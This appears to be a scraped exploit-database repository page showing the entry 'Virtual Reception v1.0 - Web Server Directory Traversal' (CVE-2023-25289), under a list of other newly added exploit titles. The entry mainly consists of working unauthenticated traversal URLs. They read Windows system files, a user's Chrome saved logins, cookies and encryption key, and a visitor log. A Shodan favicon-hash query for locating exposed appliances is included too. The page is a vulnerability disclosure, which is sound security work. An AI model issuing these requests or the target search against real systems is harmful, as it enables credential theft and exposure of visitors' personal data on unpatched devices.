668314bbda
19 changes to exploits/shellcodes/ghdb FS-S3900-24T4S - Privilege Escalation Virtual Reception v1.0 - Web Server Directory Traversal admidio v4.2.5 - CSV Injection Companymaps v8.0 - Stored Cross Site Scripting (XSS) GLPI 9.5.7 - Username Enumeration OpenEMR v7.0.1 - Authentication credentials brute force PHP Restaurants 1.0 - SQLi Authentication Bypass & Cross Site Scripting PHPFusion 9.10.30 - Stored Cross-Site Scripting (XSS) PHPJabbers Simple CMS 5.0 - SQL Injection PHPJabbers Simple CMS V5.0 - Stored Cross-Site Scripting (XSS) phpMyFAQ v3.1.12 - CSV Injection projectSend r1605 - Private file download revive-adserver v5.4.1 - Cross-Site Scripting (XSS) Serendipity 2.4.0 - File Inclusion RCE SoftExpert (SE) Suite v2.1.3 - Local File Inclusion Advanced Host Monitor v12.56 - Unquoted Service Path MilleGPG5 5.9.2 (Gennaio 2023) - Local Privilege Escalation / Incorrect Access Control
55 lines
No EOL
2.2 KiB
Text
55 lines
No EOL
2.2 KiB
Text
# Exploit Title: Virtual Reception v1.0 - Web Server Directory Traversal
|
|
# Exploit Author: Spinae
|
|
# Vendor Homepage: https://www.virtualreception.nl/
|
|
# Version: win7sp1_rtm.101119-1850 6.1.7601.1.0.65792 running on an Intel NUC5i5RY
|
|
# Tested on: all
|
|
# CVE-ID: CVE-2023-25289
|
|
|
|
We discovered the web server of the Virtual Reception appliance is prone to
|
|
an unauthenticated directory traversal vulnerability. This allows an
|
|
attacker to traverse outside the server root directory by specifying files
|
|
at the end of a URL request.
|
|
This is a NUC5i5RY
|
|
|
|
http://[ip address]/c:/WINDOWS/System32/drivers/etc/hosts
|
|
http://[ip address]/C:/windows/WindowsUpdate.log
|
|
...
|
|
|
|
A user called 'receptie' exists on the Windows system:
|
|
|
|
http://[ip address]/c:/users/receptie/ntuser.dat
|
|
http://[ip address]/c:/users/receptie/ntuser.ini
|
|
http://[ip address]/c:/users/receptie/appdata/local/temp/wmsetup.log
|
|
...
|
|
http://[ip address]/c:/users/receptie/AppData/Local/Google/Chrome/User
|
|
Data/Default/Login Data
|
|
http://[ip
|
|
address]/c:/users/receptie/AppData/Local/Google/Chrome/User%20Data/Local%20State
|
|
http://[ip address]/c:/users/receptie/AppData/Local/Google/Chrome/User
|
|
Data/Default/Cookies
|
|
...
|
|
|
|
The appliance also keeps a log of the visitors that register at the
|
|
entrance:
|
|
|
|
http://[ip address]/visitors.csv
|
|
|
|
hash icon for shodan searches:
|
|
|
|
https://www.shodan.io/search?query=http.favicon.hash%3A656388049
|
|
|
|
No reply from the vendor (phone, email, website form submissions), first
|
|
reported in 2021.
|
|
|
|
--
|
|
DISCLAIMER: Unless indicated otherwise, the information contained in this
|
|
message is privileged and confidential, and is intended only for the use of
|
|
the addressee(s) named above and others who have been specifically
|
|
authorized to receive it. If you are not the intended recipient, you are
|
|
hereby notified that any dissemination, distribution or copying of this
|
|
message and/or attachments is strictly prohibited. The company accepts no
|
|
liability for any damage caused by any virus transmitted by this message.
|
|
Furthermore, the company does not warrant a proper and complete
|
|
transmission of this information, nor does it accept liability for any
|
|
delays. If you have received this message in error, please contact the
|
|
sender and delete the message. Thank you. |